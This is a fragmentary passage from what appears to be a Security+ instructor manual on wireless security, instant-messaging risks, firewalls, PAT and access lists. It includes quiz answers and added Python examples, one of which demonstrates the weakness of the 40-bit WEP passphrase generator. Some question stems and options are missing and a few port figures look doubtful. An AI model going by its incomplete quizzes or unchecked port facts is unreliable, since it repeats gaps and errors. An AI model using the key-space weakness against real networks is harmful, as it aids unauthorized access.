   Automated key generation can be relied on only when the network adapter is the same brand and model as the WAP, because the passphrase-to-key algorithm is vendor specific. Otherwise you would need to enter the encryption keys manually in each wireless device.

12 On the Setup window, select Disable under WEP
   To disable encryption.

13 Click Apply
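The Passphrase field in this activity hides a vendor-specific key-derivation routine, which is why automated key generation only works between a matching adapter and AP. The following Python is an added example, not the course's or Linksys's code: it reproduces the two generators commonly found in utilities of this era, the Neesus Datacom 40-bit routine that Tim Newsham's reverse-engineering showed to be weak, and the MD5-based 104-bit routine, and demonstrates the 40-bit weakness with passphrases that collide. The LCG constants, the passphrases and the collision pairs are assumptions of the example.

```python
"""Passphrase-to-WEP-key generators of the kind behind the Passphrase field in
this activity, and why the 40-bit one is weak.

Added example, not from the course manual, which shows only the vendor dialog.
The 40-bit routine follows the Neesus Datacom generator as reverse-engineered
by Tim Newsham; the 104-bit routine is the MD5-based scheme most vendors used.
The LCG constants and all passphrases below are assumptions of this example.
"""
import hashlib

LCG_MULTIPLIER = 0x343FD     # assumed: the constants of the C runtime rand()
LCG_INCREMENT = 0x269EC3


def fold_seed(passphrase: str) -> int:
    """XOR the passphrase bytes into a 32-bit seed, one byte per position mod 4.
    Printable ASCII never has its top bit set, so bits 7, 15, 23 and 31 of the
    seed are always zero and the seed space is at most 2^28, not 2^32."""
    folded = [0, 0, 0, 0]
    for index, byte in enumerate(passphrase.encode("ascii")):
        folded[index % 4] ^= byte
    return folded[0] | folded[1] << 8 | folded[2] << 16 | folded[3] << 24


def wep40_keys(passphrase: str) -> list:
    """Return the four 40-bit (5-byte) WEP keys derived from the passphrase."""
    state = fold_seed(passphrase)
    key_bytes = bytearray()
    for _ in range(4 * 5):
        # Step the 32-bit LCG and keep bits 16..23 of the state as one key byte.
        state = (state * LCG_MULTIPLIER + LCG_INCREMENT) & 0xFFFFFFFF
        key_bytes.append((state >> 16) & 0xFF)
    return [bytes(key_bytes[i:i + 5]) for i in range(0, 20, 5)]


def wep104_key(passphrase: str) -> bytes:
    """Return a 104-bit (13-byte) WEP key: MD5 over the passphrase repeated to 64 bytes."""
    data = passphrase.encode("ascii")
    if not data:
        raise ValueError("empty passphrase")
    padded = (data * (64 // len(data) + 1))[:64]
    return hashlib.md5(padded).digest()[:13]


def colliding_passphrases(a: str, b: str) -> bool:
    """True when two different passphrases yield the same 40-bit keys. The XOR
    folding makes this easy: any passphrases that fold to the same seed collide."""
    return a != b and wep40_keys(a) == wep40_keys(b)


if __name__ == "__main__":
    for number, key in enumerate(wep40_keys("Paganini1"), 1):
        print(f"40-bit key {number}: {key.hex()}")
    print("104-bit key :", wep104_key("Paganini1").hex())
    # Eight repeated characters always fold to seed 0, whatever the character is.
    print("collision   :", colliding_passphrases("aaaaaaaa", "bbbbbbbb"))
    print("seed top bits clear:", (fold_seed("Paganini1") & 0x80808080) == 0)
```

Two properties do the damage: the XOR fold throws away most of the passphrase (eight repeated characters of any value give seed 0), and ASCII input can never set the top bit of any seed byte, so the effective 40-bit key space is well below 2^40 and is searched quickly. Prefer the 104-bit mode, or better, type the hex key directly rather than deriving it from a passphrase.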
C-2:

What problems are associated with the WEP initialization vector (IV)?

It is only 24 bits long
It creates weak keys
It is reused on a regular basis, allowing the hacker to see the pattern of reuse
Pay particular attention to the materials used to construct the walls, floors, and ceilings of the building. Certain materials reflect or absorb part of the signal; concrete, marble, brick, water, and especially metal are difficult to work around.

Doing a walk-through of the site

After getting an idea of the layout of the site from the blueprints, walk through the site to make sure the blueprints are accurate and to identify any other barriers that might affect radio signals. For example, you might notice that partitions, metal racks, or file cabinets have been placed in areas that originally appeared to be wide open. As you walk through, identify other devices that operate in the same radio frequency band as your WLAN, such as microwave ovens, medical equipment, military communications equipment, and baby monitors. Also note whether existing wired network jacks and power outlets are available to connect your access points to the physical network and to power them. You might also need to determine in which areas of the building an access point would not be esthetically acceptable (such as the company boardroom) and plan concessions for that space.

Identifying possible access point locations

Using the information gained in the preceding steps, you should be able to approximate the locations of the access points that will provide adequate coverage for mobile users. Areas with high concentrations of mobile users require more access points; however, avoid placing access points too close together, in order to reduce interference between them. You should also have noted where physical network jacks and electrical sockets need to be installed. Consider the power needs of the wireless workstations in each area and the different types of antennas that might be needed in different spaces.
Confirm that environmental conditions are suitable (not too hot or too cold). Once all of this information has been taken into account, create a draft design of the network to work from in the next step.

Verifying access point locations

Before you finalize your network plans, verify that your initial approximations of AP locations are correct. To do this you need the proper tools: at least one access point (and a power cord to connect it to a source of electricity), a laptop equipped with a wireless NIC, and software that can identify the AP and monitor data rates, signal strength, and signal quality. Most wireless equipment vendors include this software with the AP or the wireless NIC, but you can also download free software from wireless LAN vendors such as Cisco, 3Com, and Symbol. Some vendors provide software that not only tests signal strength but also prints out the results, which will be helpful in your post-test documentation.
Once you have gathered all of the appropriate tools, you are ready to begin testing.

1 With your draft design in hand, go to each of the points you identified as potentially good AP locations, place the AP there, and watch the site survey software as you walk around the intended space.
2 Also test the data throughput that is possible at various points in the space.
3 Take detailed notes of these results and identify where you find strong and weak signals.
4 If you find weak or dead spots, reposition the AP until you have full coverage of the space. In some cases you might not find an ideal location and will need to add an access point to solve the problem.

Documenting your findings

Now that you have tested your initial assumptions about AP locations and made any necessary adjustments, document your findings. Your final plan should provide adequate wireless coverage in every area the users indicated they would need it. Make careful drawings and spell out a list of your assumptions. The people who install the wireless system you have designed will use your documentation, as might the network administrators who support the wireless network. In addition, a great amount of time, energy, and money will be saved in the future if the network needs to be upgraded or expanded, as long as your documentation is precise and thorough.
C-3:

Here's how

Introduce this activity as a demonstration. Students should observe only. For this activity, you will need a laptop with a Netgear MA401 PC Card installed. If the Wireless Status icon is not displayed in the system tray, download and install the latest version of the Netgear MA401 driver.

If you have a different wireless network card, you can right-click the wireless connection icon in the system tray and choose Status. The screens will look different from those shown here, but will have similar information.

3 Monitor the following output: Current Tx Rate, Signal Strength, Link Quality

4 Roam around the room with the laptop and watch for any changes in transmission rate, signal strength, and link quality
   Ask a student to roam about the room and identify any objects that influence the signal strength and quality.
Do it!
C-4:
2 Why is it important to document your findings when conducting a wireless site survey?
The documentation communicates your findings from the wireless site survey. The people who will install the wireless system you have designed will use it, as will the network administrators; it is essential to have this information for support purposes on the wireless network. In addition, a great amount of time, energy, and money will be saved in the future if the network needs to be upgraded or expanded, as long as your documentation is precise and thorough.
C-5:

Here's how

Introduce this activity as a demonstration. Students should observe only.

1 In the Linksys utility, activate the Password tab

2 At Restore Factory Defaults, click Yes

3 Click Apply
   To save the changes. The system warns that your connection might be lost. Confirming proceeds to reset the WAP to the factory defaults; your connection will be terminated.
A definition of IM
Explanation  With the proliferation of instant messaging (IM) products comes an equal proliferation of problems and security threats. Five currently available and frequently used flavors of IM are AOL Instant Messenger (AIM), MSN Messenger, Yahoo! Messenger, ICQ, and Internet Relay Chat (IRC). Each of the five has suffered at least one major security problem. In addition to the security problems specific to each product, there is a series of generic problems that a technology manager faces when trying to lock down IM.

Unlike e-mail, which uses a store-and-forward model, IM uses a real-time communication model. When you type a message into an IM client and press Enter, the text of that message is immediately sent to the client(s) to which you are currently connected. This model makes IM easy, fast, and extremely dangerous.

IM networks operate in either a peer-to-peer or a peer-to-network configuration. In the peer-to-peer model, client software communicates directly with other clients; in the peer-to-network model, client software logs onto a network, which then transfers the messages between clients. Both models have pros and cons. The peer-to-peer model does not rely on a central server, so as long as two clients are not blocked they can communicate with one another; but it can expose sensitive information, such as the actual IP address of the machine on which a client is running, to the other party. The peer-to-network model relies on a central server (or group of servers), so a network outage can make IM communication unavailable. Denial-of-service (DoS) attacks are becoming more frequent, which increases the likelihood that IM will not be available when you need it.
IM security issues
The instant messenger client is typically installed on an end-users workstation and provides an interface for end-users to communicate with each other by utilizing the server resources. The server manages and relays all end-user communication and is typically maintained by a service provider such as AOL, Yahoo!, or Microsoft. The server is also responsible for the authentication and notification of user status and availability.
Increased deployment of broadband networks, as well as spare capacity in many networks, has made instant messaging a very popular way to communicate both at home and in the workplace. The increased usage of these tools also brings vulnerabilities that many organizations fail to understand and address. Many of these services, although very convenient, lack the security and encryption features that are essential for transporting sensitive and confidential data. There are serious security concerns about consumer IM systems because they can carry sensitive and confidential data over public networks in unencrypted form, and corporations have no control over data transported in such fashion once it leaves the corporate network infrastructure. Enterprise IM systems, on the other hand, are administered in-house, which makes them considerably easier to secure than consumer IM systems.

Most popular consumer IM systems share some common security risks that need to be addressed:

- IM systems typically do not prevent the transfer of files that contain viruses and Trojan horses. Such files can spread malware and cause systems to malfunction or cease to function altogether.
- Misconfigured file sharing can provide access to sensitive or confidential data, including personal data, company information, and system passwords.
- The most visible security risk associated with most IM systems is the lack of encryption. These applications transfer data as plaintext (in some cases HTML-encoded), which can easily be intercepted by an intruder. Sensitive information should always be encrypted and digitally signed before it is sent over a public network. A plaintext session can also be hijacked, which can be exploited further to obtain sensitive information.
- IM systems can be used to transport copyrighted material, which could have substantial legal consequences.
These include copyrighted pictures, documents, music files, software, and so forth. Transferring files also reveals the network addresses of the hosts involved, which attackers can use for malicious purposes such as a denial-of-service attack.

IM applications typically do not use well-known TCP ports for communication and file transfers; instead, registered ports are used:

- AOL Instant Messenger uses TCP port 5190 for file transfers and file sharing, while IM images are transferred on TCP port 4443.
- NetMessenger (MSN Messenger) uses TCP port 1863 for HTML-encoded plaintext messages. Voice and video are relayed over a direct UDP connection on ports 13324 and 13325. Application sharing takes place between clients over TCP port 1503, and file transfers use TCP port 6891 on the initiating client.
- Yahoo! Messenger typically uses TCP port 5050 for server communication and TCP port 80 for direct file transfers.
- ICQ messages are also unencrypted and are sent via TCP port 3570; voice and video traffic uses UDP port 6701.
Safeguards

You can configure the firewall to filter some or all of these ports, either to restrict particular functions within the corresponding IM applications or to prevent their use altogether. It can be difficult to block IM systems such as Yahoo! Messenger, because most of its traffic takes place over TCP port 80, the standard port for regular Web traffic. In such cases you can also prevent usage by denying access to certain domains; Yahoo! Messenger, for instance, requires the user to log onto a specific subdomain. Intrusion detection systems (IDS) can be deployed to monitor IM traffic and, where the IDS sits inline with a blocking capability, to prevent it. An IDS inspects inbound and outbound network activity and identifies suspicious patterns that might indicate an attempt to break into or compromise a system.
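As an added example (not part of the course manual), the following Python applies the safeguards just described to a batch of connection records: it matches protocol and destination port against the IM port table from this topic and, for the Yahoo! Messenger case that hides on TCP port 80, falls back to a destination-domain rule. The log lines, their field order and the Yahoo! login-domain suffix are constructed assumptions.

```python
"""Audit connection records for consumer IM traffic, using the port table from
this topic plus a domain rule for the Yahoo! Messenger case that rides on TCP 80.

Added example, not from the course manual. The log lines are constructed; their
field order (timestamp, source, destination host, protocol, destination port)
and the Yahoo! login-domain suffix are assumptions of this example.
"""

# (protocol, destination port) -> (application, function), from the text above.
IM_PORTS = {
    ("tcp", 5190): ("AOL Instant Messenger", "file transfer / file sharing"),
    ("tcp", 4443): ("AOL Instant Messenger", "images"),
    ("tcp", 1863): ("MSN Messenger", "messages"),
    ("udp", 13324): ("MSN Messenger", "voice/video"),
    ("udp", 13325): ("MSN Messenger", "voice/video"),
    ("tcp", 1503): ("MSN Messenger", "application sharing"),
    ("tcp", 6891): ("MSN Messenger", "file transfer"),
    ("tcp", 5050): ("Yahoo! Messenger", "server communication"),
    ("tcp", 3570): ("ICQ", "messages"),
    ("udp", 6701): ("ICQ", "voice/video"),
}

# Port 80 cannot be blocked outright, so match the login host instead.
# The domain suffix is an assumption for illustration.
DOMAIN_RULES = {".msg.yahoo.com": ("Yahoo! Messenger", "login/file transfer over TCP 80")}

# Constructed records: "<timestamp> <src> <dst host> <proto> <dst port>"
SAMPLE_LOG = """\
2003-04-01T09:12:03 10.0.5.21 198.51.100.7 tcp 5190
2003-04-01T09:12:09 10.0.5.21 scs.msg.yahoo.com tcp 80
2003-04-01T09:12:15 10.0.5.33 www.example.com tcp 80
2003-04-01T09:13:01 10.0.5.40 203.0.113.20 tcp 1863
2003-04-01T09:13:07 10.0.5.40 10.0.5.21 udp 13324
2003-04-01T09:14:00 10.0.5.12 10.0.0.53 udp 53""".splitlines()


def classify(record: str):
    """Return (application, function) if the record is IM traffic, else None."""
    fields = record.split()
    if len(fields) != 5:
        raise ValueError(f"malformed record: {record!r}")
    _timestamp, _source, host, proto, port = fields
    verdict = IM_PORTS.get((proto.lower(), int(port)))
    if verdict is not None:
        return verdict
    # Fall through to the domain rules for traffic on shared ports such as 80.
    for suffix, domain_verdict in DOMAIN_RULES.items():
        if host.lower().endswith(suffix):
            return domain_verdict
    return None


def audit(records):
    """Run the policy over a batch of records; return (record, app, function) hits."""
    hits = []
    for record in records:
        verdict = classify(record)
        if verdict is not None:
            hits.append((record, verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for record, app, function in audit(SAMPLE_LOG):
        print(f"{app:22} {function:32} {record}")
```

Ordinary Web traffic to www.example.com on port 80 and the DNS query are left alone, while the Yahoo! login on the same port is caught by the domain rule; the same two-stage logic is what a firewall or IDS rule set for IM needs, because a port list on its own either misses port-80 clients or blocks the Web.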
The ability to send a file through IM is extremely powerful, but also very dangerous. Unlike e-mail attachments, which can be scanned as they arrive on a corporate server, IM attachments are much harder to handle and require an antivirus package on the local machine receiving the attachment.

Application sharing

The ability to remotely control a computer can be a boon to help desk operators, but it raises several issues. If the remote control software can be triggered by the remote site, a machine with IM software running might be taken over without anyone knowing. In addition, if the remote site uses the remote control software to connect to a local site that has been physically breached, all of the actions of the controlling client might be seen by the wrong party.
Blocking IM
Blocking the use of IM is a straightforward task. If you install a corporate firewall of some sort to block the ports that IM products use, you will make IM unavailable to your employees; blocking only some IM features while allowing the rest cannot be done reliably at this time. If your employees make a convincing case that IM is useful, the best you can do is write strong policies and limit IM clients to one or two vendors so you can maximize control.
Do it!

D-1:

Answer choices (question stem not reproduced):
These applications typically do not incorporate encryption mechanisms.
Misconfigured file sharing within IM applications can lead to unwanted access to personal data.
IM applications have built-in mechanisms that prevent the spreading of viruses.
None of the above.

3 Specify the TCP or UDP port used for each of the following applications.
AOL file transfers: TCP port 5190
NetMessenger messages: TCP port 1863
NetMessenger voice and video traffic: UDP ports 13324 and 13325
NetMessenger file transfers: TCP port 6891
Yahoo! Messenger file transfers: TCP port 80
ICQ messages: TCP port 3570
ICQ voice and video traffic: UDP port 6701

Answers to the remaining questions (stems not reproduced):

IM uses real-time communications; transaction logging is optional. Messages are passed in plaintext format by default. If a hacker can gain access to an unguarded terminal, he or she can pose a quick question that requires an immediate response on the part of the person being questioned.

Each client must have antivirus software installed to scan IM messages for viruses. A machine running IM software can be taken over with remote control software without anyone knowing it. In addition, if the remote control software is used to connect to a local site, all the actions of the controlling client can be seen by the wrong party.
5 What are some of the legal issues surrounding Instant Messaging software in the workplace?
IM carries with it a possible threat of litigation or even criminal indictment should the wrong message be sent to or received by the wrong person (similar to e-mail). Corporations spend millions each year to safeguard themselves from legal issues surrounding the proper use of e-mail. Many times businesses have even gone so far as to monitor the content of messages to ensure that their employees say nothing inappropriate.
Review questions

1 One way to secure a wireless network is to use a:
A Firewall
B Scrambler
C VPN
D DMZ

2 A recommended practice for wireless LANs is to: (Choose all that apply.)
A Disable file and print sharing
B Disable NetBEUI
C
D
E All of the above

3 Which of the following can interfere with wireless transmission? (Choose all that apply.)
A Brick walls
B Cell phones
C
D

4 The 802.11a standard can use which of the following bands?
A 2.4GHz
B 5GHz
C 2.4MHz
D 5MHz

5 The 802.11b standard can use which of the following bands?
A 2.4GHz
B 5GHz
C 2.4MHz
D 5MHz

6 The 802.11a standard can transmit data at speeds of up to _____Mbps.
A 11
B 36
C 48
D 54

7 (Question stem not reproduced.)
B WEP
C WSP
D WDP

8 The IEEE working group F has been tasked with creating a standard to allow for better roaming between access points and distribution systems. True or false?

True

9 Which of the following is part of the WAP 1.x stack? (Choose all that apply.)
A WAE
B WTP
C WSSL
D WDP
E WIP

10 WAP 2.0 has added a number of features that include which of the following? (Choose all that apply.)
A WAP Push
B User agent profile
C Wireless Telephony Application
D External Functionality Interface (EFI)
E Multimedia Messaging Service (MMS)
F

11 Instant messaging networks operate in either ______________ or ___________ configurations. (Choose all that apply.)
A peer-to-network
B network-to-network
C client/server
D peer-to-peer

12 (Question stem not reproduced.)
A 5190
B 5050
C 80
D 1023
detection systems.
G Perform network monitoring.
Firewall concepts
Explanation  There are really only two principal ways to secure a computer or network of computers from external breach: physically isolate it from the outside world by disconnecting the network and telecom cables that connect it to any other computers or networks, or virtually isolate it by implementing a firewall to stand guard between the outside world and the computer or network.

A firewall is a barrier that isolates one network from another. Its main function is to protect an internal, private network from unauthorized access from an external, public network. The firewall can be a dedicated physical device or a software feature added to a router, switch, or similar device. There are many ways to build a network firewall, but the following five steps will ensure that you have not missed anything:

1 Draft a written security policy. A well-written security policy ensures that the necessary blend of security and services is provided to the organization.
2 Design the firewall to implement the security policy.
3 Implement the firewall design by installing the selected hardware and software.
4 Test the firewall. It's fine to say you have a firewall, but if it doesn't work as intended it gives you a false sense of security and increases risk rather than reducing it.
5 Review new threats, requirements for additional security, and updates to the adopted systems and software. If additions or modifications are necessary, repeat the process from step one in light of these changes.

This is the management cycle for firewall protection, but the requirements of each step, especially the first, are often minimized or skipped because most corporate managers find network security to be an arcane subject.
Network devices
Scan for services that were not explicitly authorized by the company. Some employees might set up ad hoc FTP servers or Web servers, so it is critical to scan for open ports at all addresses. In addition, consider who might want to circumvent your security measures, and identify their motives. The types of hackers range from sport hackers, who are satisfied with merely penetrating your defenses, to hackers whose intent is causing damage or theft.
Which services should be made available?
In answering the third question, you should catalogue which services need to be available to your company's employees. Available services might provide access to intruders, so it's imperative that you lock out those services that are not needed. The following table lists common port mappings:
Service                                  TCP port #                    UDP port #
Dial Pad                                 51210                         51200, 51201
DNS                                      53                            53
FTP                                      20, 21
ICQ                                      4000
IPSEC                                    500
IRC (Estimation)                         6661-6667
HTTP                                     80
HTTPS                                    443
NetMeeting                               389, 522, 1503, 1720, 1731
NNTP                                     119
Novell VPN software (BorderManager)      353, 2010, 213
pcAnywhere 2.0, 7.0, 7.50, 7.51          65301
POP3                                     110
PPTP                                     1723
SMTP                                     25
SSH                                      22, 1019-1023
SNMP                                     161
Telnet                                   23
TFTP                                     69
AOL Instant Messenger                    5190, 4443
Further port values appear in the source table without a legible service label: 22, 1019-1023; 22; 443; 1080-6660.
By blocking those ports that correspond to services you do not need, your system will be more secure.
CompTIA Security+ Certification
Who gets access to which resources?
In addition to determining which services are required, you must determine who should have access to which resources within your network. You should list the employees or groups of employees along with the files, file servers, databases, and database servers to which they need access. In addition, you should list which employees need remote access to the network.
Who administers the network?
This question is easily answered, as it will be you who will be administering the network. On larger networks, however, there might be more than one person responsible for administering the network. These people, and the scope of individual management control, need to be determined up front.
Do it!
A-1:
2 What are the recommended steps to build a network firewall? (Choose all that apply.)
A Draft a written security policy.
B Design the firewall to implement the security policy.
C Implement the firewall design by installing the selected hardware and/or software.
D Test the firewall.
E Review new threats.
F All of the above.
3 One of the steps to drafting a security policy is to catalogue which services need to be available to your company's employees and lock out all services that are not needed. True or false?
True
Port address translation
PAT guarantees a unique connection by using a combination of an IP address and a TCP or UDP port, called a socket, rather than the address alone. When an internal system connects to an external resource, it typically selects a short-lived source port to create a unique socket. When the request routes through the NAT, the IP address is changed to a public address and a short-lived port is selected that guarantees uniqueness. A table of the source address, source port, NAT source IP, NAT source port, destination IP, and destination port is maintained by the router. The combination of NAT source IP and NAT source port with destination IP and port is guaranteed to be unique. PAT is really a subset of NAT and is now available in very inexpensive routers sold for home use. This provides a useful method for conserving IP addresses, as well as concealing internal system identities. A drawback of this method is on the server side: each external IP address can only support a single process on any given port, although the NAT router can direct these connections to different internal systems. NAT with port address translation is shown in the following table:
Inside Source Address:Port    Outside Source Address:Port    Outside Destination Address
10.1.1.2:1100                 192.50.20.1:1024               192.50.20.2
10.1.1.3:1200                 192.50.20.1:1025               192.50.20.3
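The translation table above, worked through as an added example that is not part of the course manual: two inside sockets are mapped onto one outside address with distinct short-lived ports, a reply is mapped back through the table, and an unsolicited inbound packet finds no entry. The addresses and ports are the manual's; the destination port 80 and the class and function names are assumptions made for this example.

```python
"""Added example, not from the course manual: a minimal port address
translation (PAT) table. Addresses and ports follow the manual's table;
destination port 80 and all names here are constructed for the example."""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Flow:
    """One direction of a TCP/UDP conversation, identified by its two sockets."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


class PatRouter:
    """Translates many inside sockets onto a single outside IP address."""

    def __init__(self, outside_ip: str, first_port: int = 1024):
        self.outside_ip = outside_ip
        self.next_port = first_port
        # inside (src ip, src port, dst ip, dst port) -> outside port
        self.outbound = {}
        # (outside port, remote ip, remote port) -> inside (ip, port)
        self.inbound = {}

    def translate_outbound(self, f: Flow) -> Flow:
        """Rewrite the source socket of an inside-originated packet."""
        key = (f.src_ip, f.src_port, f.dst_ip, f.dst_port)
        if key not in self.outbound:
            # Allocate a fresh short-lived port: uniqueness of the outside
            # socket, not of the outside address, keeps the flows apart.
            port = self.next_port
            self.next_port += 1
            self.outbound[key] = port
            self.inbound[(port, f.dst_ip, f.dst_port)] = (f.src_ip, f.src_port)
        return Flow(self.outside_ip, self.outbound[key], f.dst_ip, f.dst_port)

    def translate_inbound(self, f: Flow) -> Optional[Flow]:
        """Rewrite the destination of a packet arriving from outside.
        None means there is no table entry: unsolicited traffic is dropped,
        which is also why one outside port can serve only one inside process."""
        key = (f.dst_port, f.src_ip, f.src_port)
        if key not in self.inbound:
            return None
        in_ip, in_port = self.inbound[key]
        return Flow(f.src_ip, f.src_port, in_ip, in_port)

    def table(self):
        """Rows in the manual's layout: inside socket, outside socket, destination."""
        return [
            (f"{sip}:{sport}", f"{self.outside_ip}:{oport}", dip)
            for (sip, sport, dip, dport), oport in self.outbound.items()
        ]


def build_manual_table() -> PatRouter:
    """Replay the two connections shown in the manual's PAT table."""
    router = PatRouter("192.50.20.1")
    router.translate_outbound(Flow("10.1.1.2", 1100, "192.50.20.2", 80))
    router.translate_outbound(Flow("10.1.1.3", 1200, "192.50.20.3", 80))
    return router


if __name__ == "__main__":
    for row in build_manual_table().table():
        print(*row, sep="  ")
```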
Basic packet filtering
After NAT, the most basic security function performed by a firewall is packet filtering. Packet filters decide whether to forward individual TCP/IP packets based on information contained in the packet header and on filtering rules set by the network administrator. Most packet filters can be configured to screen information based on the following data fields: protocol type, IP address, TCP/UDP port, and source routing information. Improper filtering can end up blocking valid packets or permitting rogue packets. For a more thorough discussion of network packet handling, see the section on routers later in this unit.
Stateful firewalls
Stateful firewalls represent a major advancement in firewall technology. They keep a record of every network connection in which they participate. They can record session-specific information, including which ports are in use on the client and server. This is important because, although most Internet services run on well-known ports, Internet clients might be using any port above 1023. A basic (stateless) packet filter must let Web servers respond to browsers at one of these high port numbers, but it can't tell which one, so it leaves them all open. Stateful packet inspection enhances security by allowing the filter to distinguish on which side of the firewall a connection was initiated. This latter feature is essential to blocking IP spoofing attacks. A stateful packet filter monitors the three-way handshake that initiates a TCP connection. Only TCP packets that are identified as being a part of the handshake, or that can be identified with an established connection, are allowed through the firewall.
Some filters even respond to connection requests on behalf of the internal server until the three-way handshake is properly completed, mimicking the connection to the internal server, and then they begin passing packets once the connection is made. Once a session is properly ended or times out, no additional packets are allowed on that connection without a new three-way handshake. This is an effective countermeasure against SYN floods.
Access control lists
Traffic filtering is available through access control lists (ACLs). A Cisco router provides different levels of filtering, using either a standard or an extended list (the latter allows filtering by additional criteria). The basic syntax is as follows:
access-list list_number permit/deny source_IP_address network_mask
For example, to stop any inbound packet with an internal (spoofed) source IP address:
access-list 101 deny 10.13.31.0 0.0.0.255
At the same time, to let all outbound internal packets through with a legitimate source IP address, include:
access-list 102 permit 10.13.31.0 0.0.0.255
Access lists are executed from the first statement to the last until a match on the inspected packet is found; then all processing of the list stops, and the rule of the first match is applied. There is an implied "deny everything else" at the end of every list, so if no match occurs, the packet is denied by default.
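The first-match and implicit-deny behaviour just described, as an added example that is not part of the course manual: a small evaluator for Cisco-style standard access-list statements with wildcard masks. List numbers 101 and 102 and the 10.13.31.0 0.0.0.255 entries are the manual's; the added `permit any` line and the packet source addresses are assumptions made for this example.

```python
"""Added example, not from the course manual: a first-match evaluator for
Cisco-style standard access lists, including the implied deny at the end of
every list. The 101/102 statements follow the manual; the 'permit any'
line and the sample source addresses are constructed for this example."""
import ipaddress

# Constructed lists: 101 is applied inbound and 102 outbound, as in the text.
# 'permit any' is added so that list 101 does more than deny everything.
ACL_TEXT = """
access-list 101 deny 10.13.31.0 0.0.0.255
access-list 101 permit any
access-list 102 permit 10.13.31.0 0.0.0.255
"""


def _parse_source(addr: str, wildcard: str):
    """Return (network_bits, care_mask). A Cisco wildcard is an inverted
    mask: a 0 bit must match, a 1 bit is ignored."""
    if addr == "any":
        return 0, 0  # matches every address
    care = 0xFFFFFFFF ^ int(ipaddress.IPv4Address(wildcard))
    return int(ipaddress.IPv4Address(addr)) & care, care


def parse_acls(text: str) -> dict:
    """{list_number: [(action, network_bits, care_mask), ...]} in file order,
    because order is exactly what first-match evaluation depends on."""
    acls = {}
    for raw in text.strip().splitlines():
        parts = raw.split()
        if len(parts) < 4 or parts[0] != "access-list":
            raise ValueError(f"unrecognised statement: {raw!r}")
        number, action, addr = int(parts[1]), parts[2], parts[3]
        if action not in ("permit", "deny"):
            raise ValueError(f"action must be permit or deny: {raw!r}")
        wildcard = parts[4] if len(parts) > 4 else "0.0.0.0"  # bare address = one host
        acls.setdefault(number, []).append((action,) + _parse_source(addr, wildcard))
    return acls


def evaluate(acl, src_ip: str) -> str:
    """Walk the list top to bottom; the first match decides and processing
    stops. If nothing matches, the implied 'deny everything else' applies."""
    src = int(ipaddress.IPv4Address(src_ip))
    for action, net, care in acl:
        if src & care == net:
            return action
    return "deny"


def order_matters():
    """Same two statements for list 101 in both orders. With 'permit any'
    first, every packet matches it and the anti-spoofing deny is never
    reached; the manual's order blocks the spoofed source."""
    wrong = parse_acls(
        "access-list 101 permit any\naccess-list 101 deny 10.13.31.0 0.0.0.255"
    )
    right = parse_acls(ACL_TEXT)
    spoofed_inbound_source = "10.13.31.7"
    return evaluate(wrong[101], spoofed_inbound_source), evaluate(right[101], spoofed_inbound_source)


if __name__ == "__main__":
    acls = parse_acls(ACL_TEXT)
    for ip in ("10.13.31.7", "198.51.100.5"):
        print(f"inbound from {ip}: {evaluate(acls[101], ip)}")
    for ip in ("10.13.31.200", "192.0.2.1"):
        print(f"outbound from {ip}: {evaluate(acls[102], ip)}")
    print("reversed vs. correct order for a spoofed source:", order_matters())
```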
Do it!
A-2:
2 The problem with basic NAT is that each active connection requires a unique external address for the duration of the communication. True or false?
True
3 Stateless packet filters can record session-specific information about the network connection. True or false?
False: Stateful packet filters do this.
4 Which of the following data items is found in the port address translation table? (Choose all that apply.)
A Source address
B NAT source port
C NAT source IP address
D Destination port
E All of the above
5 Most packet filters can be configured to screen information based on the protocol type, IP address, TCP/UDP port, and source routing information fields. True or false?
True
6 Access control lists work by blocking all inbound packets. True or false?
False: They can either allow or block inbound or outbound packets for specific IP addresses.
Topic B: Routers
This topic covers the following CompTIA Security+ exam objective:
#     Objective
3.1   Understand security concerns and concepts of the following types of devices: Routers
Introducing routers
Explanation A router is a network management device that sits between different network segments and routes traffic from one network to another. This role of digital go-between is essential because it allows different networks to communicate with one another and allows the Internet to function. With the addition of packet filtering, however, routers can take on the additional role of digital traffic cop.
Demilitarized zone (DMZ)
The demilitarized zone (DMZ) is the area that a company sets aside for servers that are publicly accessible or have lower security requirements than other internal servers. The DMZ gets its name from the traditional setup of a network segment between two routers. This environment is neither subject to the unsecured environment of the Internet nor fully protected by the internal router; hence it is "demilitarized." The DMZ is commonly home to public Web, FTP, and DNS servers that need to be accessed by the public. This is also a typical location to place remote dial-up access, providing defense in depth with the interior router. If a hacker gains access to the RADIUS server, he or she still must authenticate through the internal firewall. This can be seen in Exhibit 9-1.
Exhibit 9-1: An example of a demilitarized zone (DMZ)
Bastion hosts
A bastion host is defined as a computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services. An effective bastion host is configured quite differently from a typical host. Some organizations have a bastion host that offers several services at once; other organizations prefer to have several bastion hosts, each fulfilling a specific role. In either event, all unnecessary programs, services, and protocols are removed and all unnecessary network ports are disabled. In addition, bastion hosts do not share authentication services with trusted hosts within the network. This is so that, if a bastion host is compromised, the hacker cannot gain any information beyond what resides on the bastion host. ACLs are modified on the file system and other system objects. All appropriate service packs, hot fixes, and patches should be installed on bastion hosts. Logging of all security-related events should also be enabled, and those logs should be reviewed on a regular basis to increase the chance of observing any inappropriate behavior.
Honey pots, or decoy computers specifically set up to attract and track potential hackers, are not considered true bastion hosts, because they are not designed to offer legitimate services to the Internet; rather, they are deliberately exposed to delay and sidetrack potential hackers and to facilitate tracking of any attempted break-ins.
Application gateways
Application gateways, also known as proxy servers, monitor specific applications such as FTP, HTTP, and Telnet, and they allow packets accessing those services to go only to those computers that are allowed. Application gateways are a good backup to packet filters because a firewall that is set up to allow a specific service such as FTP can send the allowed packets to only one computer, the application gateway. As an example of how an application gateway works, consider a site that blocks all incoming FTP connections except those to a specific computer. The router allows FTP packets to go to only one computer, the FTP application gateway. A user who wishes to connect inbound to an FTP server would have to connect first to the application gateway, and then to the destination computer, as follows:
1 A user first connects to the application gateway and enters the name of an internal computer.
2 The gateway checks the user's source IP address and accepts or rejects it according to the access control list.
3 The user might need to authenticate himself or herself with a username and password.
4 The proxy service creates an FTP connection between the gateway and the internal computer.
5 The gateway proxy service then passes bytes between the two connections.
6 The application gateway logs the connection.
The security advantages inherent in application gateways also include:
Information hiding: The application gateway might be the only computer with a name known to the outside world; the actual servers hosting services such as FTP need never be disclosed.
